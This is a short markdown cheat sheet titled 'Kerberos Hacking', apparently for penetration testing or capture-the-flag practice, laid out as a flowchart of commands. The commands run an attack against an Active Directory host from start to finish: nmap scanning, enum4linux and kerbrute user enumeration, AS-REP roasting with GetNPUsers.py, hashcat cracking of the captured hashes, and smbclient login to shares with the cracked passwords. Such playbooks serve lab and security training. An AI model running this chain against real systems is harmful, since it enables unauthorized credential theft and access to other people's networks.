Kerberos Hacking

kerberos-hacking-v1.md

graph TD
    kerberos-hacking-v1
    1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
    A[is kerberos running? -- typically port 88] -->  B
    B[find Active Directory domain names] -->|enum4linux $IP| C
    C[enumerate AD users] --> |kerbrute userenum --dc $AD-DOMAIN -d $IP /path/to/wordlist.txt| D
    D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
    E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
    F[find SMB shares with password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G
    G[connect to SMB shares] --> |smbclient -U $AD-DOMAIN/$AD-USER //$IP/$DIR| H
    H[look for further data]